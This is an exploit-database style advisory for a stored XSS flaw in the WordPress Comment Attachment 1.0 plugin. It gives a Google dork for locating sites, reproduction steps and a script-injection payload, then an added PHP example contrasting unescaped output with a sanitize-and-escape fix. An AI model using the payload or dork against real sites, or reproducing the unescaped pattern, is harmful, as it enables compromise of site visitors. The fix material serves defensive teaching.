Exploit Title: WordPress Comment Attachment 1.0 Cross Site Scripting


Software Link: http://wordpress.org/plugins/comment-attachment/
Version : 1.0
Tested on: Linux & Windows
Category: webapps
Google Dork : inurl:”/comment-attachment/comment-attachment.php”
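Exploit:
[-] Description:
The “Attachment field title” setting is saved and then printed in the comment form without HTML escaping, so markup entered by a user who can edit the Discussion settings is stored and runs in the browser when a post is viewed.
1) Download and install “Comment Attachment”.
2) Go to the Comment Attachment settings:
Settings > Discussion > Comment Attachment
3) Insert this code in “Attachment field title” and save:
"><script>alert(/Arsan/)</script>
4) View a post and its comments; follow the link:
http://localhost/wp/?p=1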
enjoy and share :) VIRUS VOLT
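
The fix for this class of bug is to sanitize the setting when it is saved and escape it when it is printed. The following is an added example, not the plugin's own code: a plain-PHP model that runs with the php CLI, where the function names and form markup are hypothetical and the WordPress functions named in the comments would replace the helpers inside a real plugin.

```php
<?php
declare(strict_types=1);
// Added example: plain-PHP model of a plugin setting that is saved, then printed.
// Function names and form markup are hypothetical, not taken from the plugin.

// Constructed sample: the value saved as the attachment field title (step 3).
$saved_title = '"><script>alert(/Arsan/)</script>';

// Vulnerable pattern: the stored value is concatenated into the page as-is.
// In the attribute, the leading "> ends the value and the tag, so the
// <script> element that follows is parsed as markup.
function render_field_unsafe(string $title): string
{
    return '<label for="attachment">' . $title . '</label>'
        . '<input type="file" id="attachment" title="' . $title . '">';
}

// Fix, part 1: sanitize on save so only plain text is stored.
// WordPress equivalent: sanitize_text_field() as the setting's sanitize callback.
function sanitize_title(string $raw): string
{
    return trim(strip_tags($raw));
}

// Fix, part 2: escape on output for the context the value lands in.
// WordPress equivalents: esc_html() for element text, esc_attr() for attributes.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_field_safe(string $title): string
{
    return '<label for="attachment">' . esc($title) . '</label>'
        . '<input type="file" id="attachment" title="' . esc($title) . '">';
}

// A value stored before the fix is still rendered inert by output escaping.
echo "unsafe:    ", render_field_unsafe($saved_title), "\n";
echo "escaped:   ", render_field_safe($saved_title), "\n";
// New saves are stripped to text first, then escaped on output as well.
echo "sanitized: ", render_field_safe(sanitize_title($saved_title)), "\n";
```

Output escaping is the control that matters for values already in the database; sanitizing on save alone leaves previously stored titles untouched.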